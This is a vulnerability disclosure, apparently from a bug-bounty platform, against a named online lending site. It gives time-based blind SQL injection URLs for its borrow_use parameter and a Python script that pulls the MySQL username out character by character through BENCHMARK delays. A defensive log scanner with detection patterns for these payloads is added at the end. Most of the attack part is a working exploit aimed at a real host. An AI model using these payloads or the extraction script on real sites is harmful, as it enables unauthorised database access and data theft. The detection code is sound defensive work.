2015-10-19: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed to the public.
2015-12-03: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
http://lbydai.com/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use=') and 'aa' like if(length(user()) like 14,BENCHMARK(6000000,encode("hello","goodbye")),'a') -- &hasinvest=&keywords=&order=&spread_month=10
If the condition above is true, the response is delayed by about 8 seconds, which means user() is 14 characters long. If it is false, the delay is a little over 2 seconds:
http://lbydai.com/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use=') and 'aa' like if((mid(user()from(1)for(1))) like '%r%',BENCHMARK(6000000,encode("hello","goodbye")),'a') -- &hasinvest=&keywords=&order=&spread_month=10
If the condition above is true, the response is delayed by about 8 seconds (this shows that the first character of user() is "r").
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded',}
# Character set tried at each position of user()
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print '[%s] Start to retrieve MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 15):
    for payload in payloads:
        #time.sleep(5)
        # Time-based condition: BENCHMARK() runs only when character i of user() matches payload
        s = "') and 'aa' like if((mid(user()from(%s)for(1))) like '%%%s%%',BENCHMARK(6000000,encode(\"hello\",\"goodbye\")),'a') -- " % (i, (payload))
        s = "/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use=" + urllib.quote(s) + "&hasinvest=&keywords=&order=&spread_month=10"
        conn = httplib.HTTPConnection('lbydai.com', timeout=100)
        conn.request(method='POST', url=s, headers=headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        conn.close()
        print '.',
        print time.time() - start_time
        # A response slower than 7.7 s means the condition held for this character
        if time.time() - start_time > 7.7:
            user += payload
            print '\n[in progress]', user,
            break
print '\n[Done] MySQL user is %s' % user
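The timing-based inference described above, seen from the defender's side: an added example (not part of the original report or the site's code) that scans constructed access-log lines for the delay-function payload and quote break-out pattern used here and correlates them with response time. The log format (ip, method, URL, status, bytes, duration in ms) and the 5-second slow-response threshold are assumptions.

```python
#!/usr/bin/env python3
"""Flag time-based blind SQL injection probes (BENCHMARK()/SLEEP()) in access logs."""
import re
from urllib.parse import urlencode, urlsplit, parse_qsl

# Time-delay primitives that blind-injection payloads rely on.
DELAY_FUNCS = re.compile(r"\b(benchmark|sleep|pg_sleep)\s*\(|waitfor\s+delay", re.I)
# Quote/paren break-out followed by a boolean operator, as in:  ') and 'aa' like if(
BREAKOUT = re.compile(r"['\"]\)?\s*(and|or)\s+", re.I)
SLOW_MS = 5000  # assumed threshold; tune to the application's normal latency
# Assumed log format: ip method url status bytes duration_ms
LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) \d+ (?P<ms>\d+)$")

def analyze_line(line):
    """Return (ip, parameter, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ms = int(m.group("ms"))
    for name, value in parse_qsl(urlsplit(m.group("url")).query, keep_blank_values=True):
        reasons = []
        if DELAY_FUNCS.search(value):
            reasons.append("delay-function")
        if BREAKOUT.search(value):
            reasons.append("quote-breakout")
        if reasons and ms >= SLOW_MS:
            reasons.append("slow-response")  # payload pattern plus a slow reply: high confidence
        if reasons:
            return (m.group("ip"), name, reasons)
    return None

def scan(log_text):
    """Run analyze_line over every line and keep the hits."""
    return [hit for hit in map(analyze_line, log_text.splitlines()) if hit]

# Constructed sample log lines (not real traffic); the payload is the one quoted in the report.
def _req(ip, borrow_use, ms):
    q = urlencode({"borrow_interestrate": "2", "borrow_use": borrow_use, "spread_month": "10"})
    return f"{ip} POST /full/index.html?{q} 200 5120 {ms}"

SAMPLE_LOG = "\n".join([
    _req("203.0.113.5", "') and 'aa' like if(length(user()) like 14,BENCHMARK(6000000,encode(\"hello\",\"goodbye\")),'a') -- ", 8130),
    _req("203.0.113.5", "') and 'aa' like if((mid(user()from(1)for(1))) like '%r%',BENCHMARK(6000000,encode(\"hello\",\"goodbye\")),'a') -- ", 7950),
    _req("198.51.100.7", "house", 210),
])

if __name__ == "__main__":
    for ip, param, reasons in scan(SAMPLE_LOG):
        print(f"{ip} param={param} {','.join(reasons)}")
```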
Unable to contact the vendor, or the vendor actively refused.